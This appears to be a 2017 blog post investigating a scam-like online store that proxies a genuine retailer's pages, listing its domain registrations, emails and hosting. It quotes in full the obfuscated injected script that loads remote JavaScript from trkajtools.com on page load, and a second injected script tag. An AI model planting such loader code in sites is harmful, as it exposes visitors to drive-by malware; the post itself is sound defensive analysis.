Suspicious online store “www.atlantic-electrics.com”, “bidtravel@ya.ru” and “trkajtools.com”

Today I came across another suspicious website. This one is advertising on Amazon and other locations:

atlantic electrics advert.png

The website advertised is “www.atlantic-electrics.com”.. upon further inspection the following are red flags:

  • The domain has only been registered since 26th October 2017.. Not even two weeks old at the time of writing.
  • The domain uses “bitcoin-dns hosting”.. bitcoin doesn’t, yet, have much legitimate use.. The person hosting this website is paying by an anonymous payment method.
  • At the time of writing visitors are just being shown a proxied version of the co-op electrical website with one bit of injected code:
<script>var CIfRD = ['h,t,t,p,s,:,/,/,t,r,k,a,j,t,o,o,l,s,.,c,o,m,/,f,l,a,s,h,/,u,p,d,a,t,e'];var lF = CIfRD.join('').replace(/,/g,'');function bGZxEi() { function GN(jrekWr) {var NeSHCgurTf= document.createElement('script');NeSHCgurTf.setAttribute('type', 'text/javascript');NeSHCgurTf.setAttribute('src', jrekWr);if (typeof NeSHCgurTf != 'undefined'){document.getElementsByTagName('body')[0].appendChild(NeSHCgurTf)};}GN(lF)}if (window.addEventListener) {window.addEventListener('load', bGZxEi, false);} else if (window.attachEvent) {window.attachEvent('onload', bGZxEi);} else if (window.onLoad) {window.onload = bGZxEi; } </script> 

In short the code injected into the page requests javascript from:

hxxps://trkajtools.com/flash/update

UPDATE 2017-11-14: This has now changed and is injecting..

 <script src='https://mobileinstore.co.uk/Loaded'></script> 

Right now the above page is just serving a 0 byte file or rejecting the connection entirely.

I will come back to the trkajtools.com domain later, but for the moment let’s go back to atlantic-electrics.com.

The domain is registered with the following interesting information:

The email address “eugeneigibbons9@gmail.com”
The postcode “TS20 9GD”
The email address “bidtravel@ya.ru” (Associated with the bitcoin-dns account).

eugeneigibbons9@gmail.com
This e-mail address has been used to register two other suspicious domains of UK retailers…

https://currys.biz – a take on the name of “Currys PC World” in the UK. This site seems to just proxies through to eBuyer (another UK online electronics retailer) but also injects the “trkajtools” javascript.

https://pixmania.biz – another UK retailer.. this website currently proxies through to “coolshop” (whoever they are) and also injects the “trkajtools” javascript.

“TS20 9GD” – a postcode in the UK format however this postcode does not exist!

“bidtravel@ya.ru”
An email address associated with many writeups about sites using the Angler exploit kit.
This e-mail address is also associated with trkajtools.com

The website www.atlantic-electrics.com is hosted at 45.76.134.125 (“45.76.134.125.vultr.com”) and does not seem to host anything else.

So.. going back to “trkajtools.com”
This domain was purchased on 17th October 2017 and little intelligence exists about it. The only thing on google was the urlquery report that I ran on the domain earlier in the day. The domain also uses the “bitcoin-dns.hosting”.

The website trkajtools.com is hosted at 45.76.135.68 (“45.76.135.68.vultr.com”) and also does not seem to host anything else.

Summary

A lot of malicious or suspicious websites I find have a clear motive.. ones targeting electronics retail are normally there to steal credit card details or just trick visitors into sending money with no intention of shipping goods.
The atlantic-electrics website is far more ambiguous. It seems like a lot of effort to just infect a few people with an exploit kit whilst serving a page from a genuine retailer.
Possibly they plan to infect people while they investigate available websites and then skim the payment details once they place an order on a genuine website?

Maybe what is currently in place is just temporary and the website flips to being much more malicious at certain times of day or days of the week?

This entry was posted in Uncategorized. Bookmark the permalink.

Comment on this topic

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s